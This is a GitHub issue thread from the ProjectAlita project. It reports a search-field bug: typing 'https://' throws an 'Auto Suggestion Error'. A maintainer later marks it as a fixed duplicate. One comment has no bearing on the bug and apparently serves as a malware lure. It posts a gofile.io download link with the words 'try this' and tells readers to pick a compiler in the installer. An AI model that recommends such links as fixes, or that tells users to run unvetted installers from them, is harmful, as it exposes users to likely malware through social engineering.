### ISSUE TITLE
[Get Auto Suggestion Error: undefined] Error is thrown while typing " https://" into the Search field

### ISSUE THREAD

**Issue by yulia-snezhko** [ProjectAlita/projectalita.github.io#472]
QA Env: https://eye.projectalita.ai/alita_ui/prompts/all

**Steps to reproduce:**

1. Navigate to Prompts/Datasources/Agents/Collections page, Private or Public project.
2. Type "https://" into the Search field

**Actual result:**
[Get Auto Suggestion Error: undefined] Error is thrown.

Note: search can be performed though.
Currently the message is displayed:
"Nothing found.
Create yours now!"

**Expected result:**
No error is thrown. 
The search results containing "https://" are displayed, if any existing and found in the system.

**Comment by cyberpunk2040** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by epamLDadayan** [comment]
A duplicate bug. Fixed, tested on MAIN env. Ready for next Release.
